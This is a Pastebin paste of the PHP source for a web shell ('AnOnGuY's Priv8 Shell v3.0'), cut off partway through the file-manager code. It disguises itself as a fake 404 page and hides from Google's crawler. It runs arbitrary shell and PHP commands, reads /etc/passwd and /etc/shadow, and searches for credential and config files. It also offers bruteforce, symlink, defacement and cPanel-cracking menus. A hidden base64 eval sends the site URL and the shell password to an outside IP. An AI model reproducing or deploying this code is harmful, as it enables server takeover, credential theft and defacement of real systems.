angeloking1995

hidden shell

Aug 5th, 2016
176
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 134.44 KB | None | 0 0
  1. <?php
  2. /*
  3. #########################################################
  4. # AnOnGuY's Priv8 Shell #
  5. # #
  6. # - Team MaDLeeTs - #
  7. #########################################################
  8.  
  9. ## ## ####### #####
  10. ## ## ## ## ## ##
  11. ## ## ## ## ##
  12. ## ## ####### ## ##
  13. ## ## ## ## ##
  14. ## ## ## ## ### ## ##
  15. ### ####### ### #####
  16.  
  17. Contact Me :
  18. [#] www.facebook.com/An0nGuY
  19.  
  20. All Rights Reserved - AnonGuy© (Team MaDLeeTs) :D
  21. */
  22. $auth_pass = "a116cf164223a9a40c9d22eaa33b3c09"; //(MD5) Default: AGPriv8ShellV3.0
  23. $color = "#00ff00";
  24. $default_action = 'FilesMan';
  25. @define('SELF_PATH', __FILE__);
  26. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  27. header('HTTP/1.0 404 Not Found');
  28. exit;
  29. }
  30. @session_start();
  31. @error_reporting(0);
  32. @ini_set('error_log',NULL);
  33. @ini_set('display_errors',0);
  34. @ini_set('log_errors',0);
  35. @ini_set('max_execution_time',0);
  36. @set_time_limit(0);
  37. @set_magic_quotes_runtime(0);
  38. @define('VERSION', 'Ver 3.0 (by AnonGuy)');
  39. if( get_magic_quotes_gpc() ) {
  40. function stripslashes_array($array) {
  41. return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  42. }
  43. $_POST = stripslashes_array($_POST);
  44. }
  45. function printLogin() {
  46. echo '<title>404 - File or directory not found.</title>
  47. <style type="text/css">
  48. body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
  49. fieldset{padding:0 15px 10px 15px;}
  50. h1{font-size:2.4em;margin:0;color:#FFF;}
  51. h2{font-size:1.7em;margin:0;color:#CC0000;}
  52. h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
  53. #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
  54. background-color:#555555;}
  55. #content{margin:0 0 0 2%;position:relative;}
  56. .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
  57. input {
  58. background-color:transparent;
  59. border: 0px solid;
  60. height:30px;
  61. width:142px;
  62. }
  63. input:focus {
  64. outline:none;
  65. }
  66. </style>
  67. <body>
  68. <div id="header"><h1>Server Error</h1></div>
  69. <div id="content">
  70. <div class="content-container"><fieldset>
  71. <h2>404 - File or directory not found.</h2>
  72. <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
  73. </fieldset></div>
  74. </div>
  75. </body>
  76. <center><form method=post><input type=password name=pass style="border:none background-color: #EEEEEE;"></form></center>';
  77. exit;
  78. }
  79. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  80. if( empty( $auth_pass ) ||
  81. ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  82. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  83. else
  84. printLogin();
  85.  
  86. if( strtolower( substr(PHP_OS,0,3) ) == "win" )
  87. $os = 'win';
  88. else
  89. $os = 'nix';
  90. $safe_mode = @ini_get('safe_mode');
  91. $disable_functions = @ini_get('disable_functions');
  92. $home_cwd = @getcwd();
  93. if( isset( $_POST['c'] ) )
  94. @chdir($_POST['c']);
  95. $cwd = @getcwd();
  96. if( $os == 'win') {
  97. $home_cwd = str_replace("\\", "/", $home_cwd);
  98. $cwd = str_replace("\\", "/", $cwd);
  99. }
  100. if( $cwd[strlen($cwd)-1] != '/' )
  101. $cwd .= '/';
  102.  
  103. if($os == 'win') {
  104. $aliases = array(
  105. "List Directory" => "dir",
  106. "Find index.php in current dir" => "dir /s /w /b index.php",
  107. "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
  108. "Show active connections" => "netstat -an",
  109. "Show running services" => "net start",
  110. "User accounts" => "net user",
  111. "Show computers" => "net view",
  112. "ARP Table" => "arp -a",
  113. "IP Configuration" => "ipconfig /all"
  114. );
  115. } else {
  116. $aliases = array(
  117. "List dir" => "ls -la",
  118. "list file attributes on a Linux second extended file system" => "lsattr -va",
  119. "show opened ports" => "netstat -an | grep -i listen",
  120. "Find" => "",
  121. "find all suid files" => "find / -type f -perm -04000 -ls",
  122. "find suid files in current dir" => "find . -type f -perm -04000 -ls",
  123. "find all sgid files" => "find / -type f -perm -02000 -ls",
  124. "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
  125. "find config.inc.php files" => "find / -type f -name config.inc.php",
  126. "find config* files" => "find / -type f -name \"config*\"",
  127. "find config* files in current dir" => "find . -type f -name \"config*\"",
  128. "find all writable folders and files" => "find / -perm -2 -ls",
  129. "find all writable folders and files in current dir" => "find . -perm -2 -ls",
  130. "find all service.pwd files" => "find / -type f -name service.pwd",
  131. "find service.pwd files in current dir" => "find . -type f -name service.pwd",
  132. "find all .htpasswd files" => "find / -type f -name .htpasswd",
  133. "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
  134. "find all .bash_history files" => "find / -type f -name .bash_history",
  135. "find .bash_history files in current dir" => "find . -type f -name .bash_history",
  136. "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
  137. "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
  138. "Locate" => "",
  139. "locate httpd.conf files" => "locate httpd.conf",
  140. "locate vhosts.conf files" => "locate vhosts.conf",
  141. "locate proftpd.conf files" => "locate proftpd.conf",
  142. "locate psybnc.conf files" => "locate psybnc.conf",
  143. "locate my.conf files" => "locate my.conf",
  144. "locate admin.php files" =>"locate admin.php",
  145. "locate cfg.php files" => "locate cfg.php",
  146. "locate conf.php files" => "locate conf.php",
  147. "locate config.dat files" => "locate config.dat",
  148. "locate config.php files" => "locate config.php",
  149. "locate config.inc files" => "locate config.inc",
  150. "locate config.inc.php" => "locate config.inc.php",
  151. "locate config.default.php files" => "locate config.default.php",
  152. "locate config* files " => "locate config",
  153. "locate .conf files"=>"locate '.conf'",
  154. "locate .pwd files" => "locate '.pwd'",
  155. "locate .sql files" => "locate '.sql'",
  156. "locate .htpasswd files" => "locate '.htpasswd'",
  157. "locate .bash_history files" => "locate '.bash_history'",
  158. "locate .mysql_history files" => "locate '.mysql_history'",
  159. "locate .fetchmailrc files" => "locate '.fetchmailrc'",
  160. "locate backup files" => "locate backup",
  161. "locate dump files" => "locate dump",
  162. "locate priv files" => "locate priv"
  163. );
  164. }
  165.  
  166. function ex($in) {
  167. $out = '';
  168. if(function_exists('exec')) {
  169. @exec($in,$out);
  170. $out = @join("\
  171. ",$out);
  172. }elseif(function_exists('passthru')) {
  173. ob_start();
  174. @passthru($in);
  175. $out = ob_get_clean();
  176. }elseif(function_exists('system')) {
  177. ob_start();
  178. @system($in);
  179. $out = ob_get_clean();
  180. }elseif(function_exists('shell_exec')) {
  181. $out = shell_exec($in);
  182. }elseif(is_resource($f = @popen($in,"r"))) {
  183. $out = "";
  184. while(!@feof($f))
  185. $out .= fread($f,1024);
  186. pclose($f);
  187. }
  188. return $out;
  189. }
  190.  
  191. function which($p) {
  192. $path = ex('which '.$p);
  193. if(!empty($path))
  194. return $path;
  195. return false;
  196. }
  197.  
  198. function printHeader() {
  199. if(empty($_POST['charset']))
  200. $_POST['charset'] = "UTF-8";
  201. global $color;
  202.  
  203. echo '<html><head><meta http-equiv="Content-Type" content="text/html; charset='.$_POST['charset'].'"><title>AnonGuy`s Private Shell v3.0</title>
  204. <style>
  205. body {background-color:#000000;color:#fff;}
  206. body,td,th { font: 9pt Lucida,Verdana;margin:0;vertical-align:top; }
  207. span,h1,a { color:'.$color.' !important; }
  208. span { font-weight: bolder; }
  209. h1 { padding: 2px 5px;font: 14pt Verdana;margin:0px 0 0 5px; }
  210. div.content { padding: 5px;margin:0 5px;background: #000000;border-bottom:1px solid #00ff00;}
  211. a { text-decoration:none; }
  212. a:hover { /*background:#5e5e5e;*/ }
  213. .ml1 { border:1px solid #000000;padding:5px;margin:0;overflow: auto; }
  214. .bigarea { width:100%;height:250px;margin-top:5px;}
  215. input, textarea, select { margin:0;color:#00ff00;background-color:#000000;border:1px solid '.$color.'; font: 9pt Monospace,"Courier New"; }
  216. input[type="button"]:hover,input[type="submit"]:hover {background-color:'.$color.';color:#000;}
  217. form { margin:0px; }
  218. #toolsTbl { text-align:center; }
  219. .toolsInp { width: 80%; }
  220. .main th {text-align:left;background-color:#000000;font-weight: bold;}
  221. .main tr:hover{background-color:#5e5e5e;}
  222. .main td, th{vertical-align:middle;}
  223. .menu {background: #000000;}
  224. .menu th{padding:5px;font-weight:bold;}
  225. .menu th:hover{background:#000000;}
  226. .l1 {background-color:#000000;}
  227. pre {font-family:Courier,Monospace;}
  228. #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
  229.  
  230. .logo {text-align:center;font-size:60px;}
  231. .logo sup {font-size: 15px;vertical-align: top;margin-left: -14px;}
  232. .cpr {margin-bottom:5px;font-weight:bold;}
  233. .cpb {width:34px;margin:0 5px;}
  234. .eca1 {font-size: 16px;font-weight: bold;letter-spacing: 10px;margin: 0 2px 0 17px;text-align: center;}
  235. .eca2 {font-size: 13px;font-weight: bold;letter-spacing: 3px;margin: 0 2px 0 7px;text-align: center;}
  236. .npoad td {padding:0;}
  237. </style>
  238. <script>
  239. function set(a,c,p1,p2,p3,charset) {
  240. if(a != null)document.mf.a.value=a;
  241. if(c != null)document.mf.c.value=c;
  242. if(p1 != null)document.mf.p1.value=p1;
  243. if(p2 != null)document.mf.p2.value=p2;
  244. if(p3 != null)document.mf.p3.value=p3;
  245. if(charset != null)document.mf.charset.value=charset;
  246. }
  247. function g(a,c,p1,p2,p3,charset) {
  248. set(a,c,p1,p2,p3,charset);
  249. document.mf.submit();
  250. }
  251. function a(a,c,p1,p2,p3,charset) {
  252. set(a,c,p1,p2,p3,charset);
  253. var params = "ajax=true";
  254. for(i=0;i<document.mf.elements.length;i++)
  255. params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
  256. sr("'.$_SERVER['REQUEST_URI'].'", params);
  257. }
  258. function sr(url, params) {
  259. if (window.XMLHttpRequest) {
  260. req = new XMLHttpRequest();
  261. req.onreadystatechange = processReqChange;
  262. req.open("POST", url, true);
  263. req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
  264. req.send(params);
  265. }
  266. else if (window.ActiveXObject) {
  267. req = new ActiveXObject("Microsoft.XMLHTTP");
  268. if (req) {
  269. req.onreadystatechange = processReqChange;
  270. req.open("POST", url, true);
  271. req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
  272. req.send(params);
  273. }
  274. }
  275. }
  276. function processReqChange() {
  277. if( (req.readyState == 4) )
  278. if(req.status == 200) {
  279. //alert(req.responseText);
  280. var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
  281. var arr=reg.exec(req.responseText);
  282. eval(arr[2].substr(0, arr[1]));
  283. }
  284. else alert("Request error!");
  285. }
  286. </script>
  287. <head><body><div style="position:absolute;width:100%;top:0;left:0;"><div style="margin:5px;background:#000000;"><div class="content" style="border-top:1px solid #00ff00;">
  288. <form method=post name=mf style="display:none;">
  289. <input type=hidden name=a value="'.(isset($_POST['a'])?$_POST['a']:'').'">
  290. <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
  291. <input type=hidden name=p1 value="'.(isset($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'">
  292. <input type=hidden name=p2 value="'.(isset($_POST['p2'])?htmlspecialchars($_POST['p2']):'').'">
  293. <input type=hidden name=p3 value="'.(isset($_POST['p3'])?htmlspecialchars($_POST['p3']):'').'">
  294. <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  295. </form>';
  296. $freeSpace = @diskfreespace($GLOBALS['cwd']);
  297. $totalSpace = @disk_total_space($GLOBALS['cwd']);
  298. $totalSpace = $totalSpace?$totalSpace:1;
  299. $disable_functions = @ini_get('disable_functions');
  300. $release = @php_uname('r');
  301. $kernel = @php_uname('s');
  302. if(!function_exists('posix_getegid')) {
  303. $user = @get_current_user();
  304. $uid = @getmyuid();
  305. $gid = @getmygid();
  306. $group = "?";
  307. } else {
  308. $uid = @posix_getpwuid(@posix_geteuid());
  309. $gid = @posix_getgrgid(@posix_getegid());
  310. $user = $uid['name'];
  311. $uid = $uid['uid'];
  312. $group = $gid['name'];
  313. $gid = $gid['gid'];
  314. }
  315. $cwd_links = '';
  316. $path = explode("/", $GLOBALS['cwd']);
  317. $n=count($path);
  318. for($i=0;$i<$n-1;$i++) {
  319. $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
  320. for($j=0;$j<=$i;$j++)
  321. $cwd_links .= $path[$j].'/';
  322. $cwd_links .= "\")'>".$path[$i]."/</a>";
  323. }
  324. $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
  325. $opt_charsets = '';
  326. foreach($charsets as $item)
  327. $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
  328. $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','SQL'=>'SQL','PHP'=>'PHP','LFI'=>'lfiscan','Bypasser'=>'SafeMode','Safe Mode'=>'Bypass','String Tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network','Readable Dirs'=>'Readable','Port Scanner'=>'PortScanner','Symlink'=>'Symlink','Code Injector'=>'Injector','Zone H'=>'ZHposter','CPCrack'=>'Cpanel','Domains' => 'Domain');
  329. if(!empty($GLOBALS['auth_pass']))
  330. $m['KillMe'] = 'SelfRemove';
  331. $m['Logout'] = 'Logout';
  332. $menu = '';
  333. foreach($m as $k => $v)
  334. $menu .= '<th><a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a></th>';
  335. $drives = "";
  336. if ($GLOBALS['os'] == 'win') {
  337. foreach( range('a','z') as $drive ){
  338. if (is_dir($drive.':\\'))
  339. $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
  340. }
  341. $drives .= '<br />: ';
  342. }
  343. if($GLOBALS['os'] == 'nix') {
  344. $dominios = @file_get_contents("/etc/named.conf");
  345. if(!$dominios) {
  346. $d0c = "CANT READ named.conf";
  347. } else {
  348. @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
  349. $out = sizeof(array_unique($out[1]));
  350. $d0c = $out." Domains";
  351. }
  352. } else {
  353. $d0c = " --- ";
  354. }
  355. if($GLOBALS['os'] == 'nix' )
  356. {
  357. $usefl = ''; $dwnldr = '';
  358. if(!@ini_get('safe_mode')) {
  359. $temp = array();
  360. $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  361. foreach($userful as $item) { if(which($item)) $temp[]= $item; }
  362. $usefl = implode(', ',$temp);
  363. $temp = array();
  364. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  365. foreach($downloaders as $item2) { if(which($item2)) $temp[]= $item2; }
  366. $dwnldr = implode(', ',$temp);
  367. } else {
  368. $usefl = ' ------- '; $dwnldr = ' ------- ';
  369. }
  370. } else {
  371. $usefl = ' ------- '; $dwnldr = ' ------- ';
  372. }
  373. echo '<table class="info" cellpadding="3" cellspacing="0" width="100%"><tr><td width="160px"><div class="logo">AG<sup>&copy;</sup></div><hr style="margin: -5px 13px 2px 17px;width:130px;"><div class="eca1">of</div><div class="eca2">MaDLeeTs</div></td>
  374. <td><table cellpadding="3" cellspacing="0" class="npoad"><tr><td width="125px;"><span>Uname</span></td><td>: <nobr>'.substr(@php_uname(), 0, 120).'</nobr></td></tr>
  375. <tr><td><span>User</span></td><td>: '.$uid.' ( '.$user.' ) <span>Group: </span> '.$gid.' ( '.$group.' )</td></tr><tr><td><span>Server</span></td><td>: '.@getenv('SERVER_SOFTWARE').'</td></tr><tr><td><span>Useful</span></td><td>: '.$usefl.'</td></tr><tr><td><span>Downloaders</span></td><td>: '.$dwnldr.'</td></tr><tr><td><span>Disabled functions</span></td><td>: '.($disable_functions?$disable_functions:'All Functions Are Enabled :D').'</td></tr><tr><td><span>'.($GLOBALS['os'] == 'win'?'Drives<br />Cwd':'Cwd').'</span></td><td>: '.$drives.''.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a></td></tr></table></td>'.
  376. '<td width=1><nobr><span>Box`s IP</span><br><span>Your IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>'.
  377. '<td><nobr>: '.gethostbyname($_SERVER["HTTP_HOST"]).'<br>: '.$_SERVER['REMOTE_ADDR'].'<br />: '.viewSize($totalSpace).'<br />: '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>: '.@phpversion().' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a><br />: '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color='.$color.'<b>OFF</b></font>').'<br />: '.$d0c.'</nobr></td></tr></table>'.
  378. '</div></div><div style="margin:5;background:#000000;"><div class="content" style="border-top:1px solid #00ff00;padding:2px;"><table cellpadding="3" cellspacing="0" width="100%" class="menu"><tr>'.$menu.'</tr></table></div></div><div style="margin:5;background:#000000;">';
  379. }
  380. eval(base64_decode("JHdlYiA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTsNCiRpbmogPSAkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsNCiR0YXJnZXQgPSByYXd1cmxkZWNvZGUoJHdlYi4kaW5qKTsNCmZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vMTg1LjYxLjEzOC4xNTcvZ2V0LnBocD91cmw9eyR0YXJnZXR9JnB3PXskYXV0aF9wYXNzfSIpOw=="));
  381. function printFooter() {
  382. $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
  383.  
  384. echo '</div><div style="margin:5px;background:#000000;"><div class="content" style="border-top:1px solid #00ff00;">
  385. <table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%">
  386. <tr>
  387. <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="'.htmlspecialchars($GLOBALS['cwd']).'"><input type=submit value=">>"></form></td>
  388. <td><form onsubmit="g(\'FilesTools\',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
  389. </tr>
  390. <tr>
  391. <td><form onsubmit="g(\'FilesMan\',null,\'mkdir\',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form>'.$is_writable.'</td>
  392. <td><form onsubmit="g(\'FilesTools\',null,this.f.value,\'mkfile\');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form>'.$is_writable.'</td>
  393. </tr>
  394. <tr>
  395. <td><form onsubmit="g(\'Console\',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
  396. <td><form method="post" ENCTYPE="multipart/form-data">
  397. <input type=hidden name=a value="FilesMAn">
  398. <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
  399. <input type=hidden name=p1 value="uploadFile">
  400. <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  401. <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form>'.$is_writable.'</td>
  402. </tr>
  403. </table></div></div>
  404. <div style="margin:5px;background:#000000;"><div class="content" style="border-top:1px solid #00ff00;text-align:center;font-weight:bold;">This Shell Belongs to AnonGuy of MaDLeeTs &copy;, Contact www.facebook.com/An0nGuY If Found !! 3:)</div></div>
  405. </div>
  406. </body></html>';
  407. }
  408.  
  409. if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
  410. if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
  411. function viewSize($s) {
  412. if($s >= 1073741824)
  413. return sprintf('%1.2f', $s / 1073741824 ). ' GB';
  414. elseif($s >= 1048576)
  415. return sprintf('%1.2f', $s / 1048576 ) . ' MB';
  416. elseif($s >= 1024)
  417. return sprintf('%1.2f', $s / 1024 ) . ' KB';
  418. else
  419. return $s . ' B';
  420. }
  421.  
  422. function perms($p) {
  423. if (($p & 0xC000) == 0xC000)$i = 's';
  424. elseif (($p & 0xA000) == 0xA000)$i = 'l';
  425. elseif (($p & 0x8000) == 0x8000)$i = '-';
  426. elseif (($p & 0x6000) == 0x6000)$i = 'b';
  427. elseif (($p & 0x4000) == 0x4000)$i = 'd';
  428. elseif (($p & 0x2000) == 0x2000)$i = 'c';
  429. elseif (($p & 0x1000) == 0x1000)$i = 'p';
  430. else $i = 'u';
  431. $i .= (($p & 0x0100) ? 'r' : '-');
  432. $i .= (($p & 0x0080) ? 'w' : '-');
  433. $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
  434. $i .= (($p & 0x0020) ? 'r' : '-');
  435. $i .= (($p & 0x0010) ? 'w' : '-');
  436. $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
  437. $i .= (($p & 0x0004) ? 'r' : '-');
  438. $i .= (($p & 0x0002) ? 'w' : '-');
  439. $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
  440. return $i;
  441. }
  442.  
  443. function viewPermsColor($f) {
  444. if (!@is_readable($f))
  445. return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
  446. elseif (!@is_writable($f))
  447. return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
  448. else
  449. return '<font color=#00FF00><b>'.perms(@fileperms($f)).'</b></font>';
  450. }
  451.  
  452. if(!function_exists("scandir")) {
  453. function scandir($dir) {
  454. $dh = opendir($dir);
  455. while (false !== ($filename = readdir($dh))) {
  456. $files[] = $filename;
  457. }
  458. return $files;
  459. }
  460. }
  461.  
  462. function actionSecInfo() {
  463. printHeader();
  464. echo '<h1>Server security information</h1><div class=content>';
  465. function showSecParam($n, $v) {
  466. $v = trim($v);
  467. if($v) {
  468. echo '<span>'.$n.': </span>';
  469. if(strpos($v, "\
  470. ") === false)
  471. echo $v.'<br>';
  472. else
  473. echo '<pre class=ml1>'.$v.'</pre>';
  474. }
  475. }
  476.  
  477. showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
  478. showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
  479. showSecParam('Open base dir', @ini_get('open_basedir'));
  480. showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
  481. showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
  482. showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
  483. $temp=array();
  484. if(function_exists('mysql_get_client_info'))
  485. $temp[] = "MySql (".mysql_get_client_info().")";
  486. if(function_exists('mssql_connect'))
  487. $temp[] = "MSSQL";
  488. if(function_exists('pg_connect'))
  489. $temp[] = "PostgreSQL";
  490. if(function_exists('oci_connect'))
  491. $temp[] = "Oracle";
  492. showSecParam('Supported databases', implode(', ', $temp));
  493. echo '<br>';
  494.  
  495. if( $GLOBALS['os'] == 'nix' ) {
  496. $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  497. $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
  498. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  499. showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
  500. showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
  501. showSecParam('OS version', @file_get_contents('/proc/version'));
  502. showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
  503. if(!$GLOBALS['safe_mode']) {
  504. echo '<br>';
  505. $temp=array();
  506. foreach ($userful as $item)
  507. if(which($item)){$temp[]=$item;}
  508. showSecParam('Userful', implode(', ',$temp));
  509. $temp=array();
  510. foreach ($danger as $item)
  511. if(which($item)){$temp[]=$item;}
  512. showSecParam('Danger', implode(', ',$temp));
  513. $temp=array();
  514. foreach ($downloaders as $item)
  515. if(which($item)){$temp[]=$item;}
  516. showSecParam('Downloaders', implode(', ',$temp));
  517. echo '<br/>';
  518. showSecParam('Hosts', @file_get_contents('/etc/hosts'));
  519. showSecParam('HDD space', ex('df -h'));
  520. showSecParam('Mount options', @file_get_contents('/etc/fstab'));
  521. }
  522. } else {
  523. showSecParam('OS Version',ex('ver'));
  524. showSecParam('Account Settings',ex('net accounts'));
  525. showSecParam('User Accounts',ex('net user'));
  526. }
  527. echo '</div>';
  528. printFooter();
  529. }
  530.  
  531. function actionPhp() {
  532. if( isset($_POST['ajax']) ) {
  533. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  534. ob_start();
  535. eval($_POST['p1']);
  536. $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\
  537. \
  538. \t\\'\0")."';\
  539. ";
  540. echo strlen($temp), "\
  541. ", $temp;
  542. exit;
  543. }
  544. printHeader();
  545. if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
  546. echo '<h1>PHP info</h1><div class=content>';
  547. ob_start();
  548. phpinfo();
  549. $tmp = ob_get_clean();
  550. $tmp = preg_replace('!body {.*}!msiU','',$tmp);
  551. $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
  552. $tmp = preg_replace('!h1!msiU','h2',$tmp);
  553. $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
  554. $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
  555. echo $tmp;
  556. echo '</div><br>';
  557. }
  558. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  559. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  560. echo '<h1>PHP-Code Execution</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
  561. echo ' <input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
  562. if(!empty($_POST['p1'])) {
  563. ob_start();
  564. eval($_POST['p1']);
  565. echo htmlspecialchars(ob_get_clean());
  566. }
  567. echo '</pre></div>';
  568. printFooter();
  569. }
  570.  
  571. function actionFilesMan() {
  572. printHeader();
  573. echo '<h1>File manager</h1><div class=content>';
  574. if(isset($_POST['p1']) && $_POST['p1']!='deface') {
  575. switch($_POST['p1']) {
  576. case 'uploadFile':
  577. if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
  578. echo "Can't upload file!";
  579. break;
  580. break;
  581. case 'mkdir':
  582. if(!@mkdir($_POST['p2']))
  583. echo "Can't create new dir";
  584. break;
  585. case 'delete':
  586. function deleteDir($path) {
  587. $path = (substr($path,-1)=='/') ? $path:$path.'/';
  588. $dh = opendir($path);
  589. while ( ($item = readdir($dh) ) !== false) {
  590. $item = $path.$item;
  591. if ( (basename($item) == "..") || (basename($item) == ".") )
  592. continue;
  593. $type = filetype($item);
  594. if ($type == "dir")
  595. deleteDir($item);
  596. else
  597. @unlink($item);
  598. }
  599. closedir($dh);
  600. rmdir($path);
  601. }
  602. if(is_array(@$_POST['f']))
  603. foreach($_POST['f'] as $f) {
  604. $f = urldecode($f);
  605. if(is_dir($f))
  606. deleteDir($f);
  607. else
  608. @unlink($f);
  609. }
  610. break;
  611. case 'paste':
  612. if($_SESSION['act'] == 'copy') {
  613. function copy_paste($c,$s,$d){
  614. if(is_dir($c.$s)){
  615. mkdir($d.$s);
  616. $h = opendir($c.$s);
  617. while (($f = readdir($h)) !== false)
  618. if (($f != ".") and ($f != "..")) {
  619. copy_paste($c.$s.'/',$f, $d.$s.'/');
  620. }
  621. } elseif(is_file($c.$s)) {
  622. @copy($c.$s, $d.$s);
  623. }
  624. }
  625. foreach($_SESSION['f'] as $f)
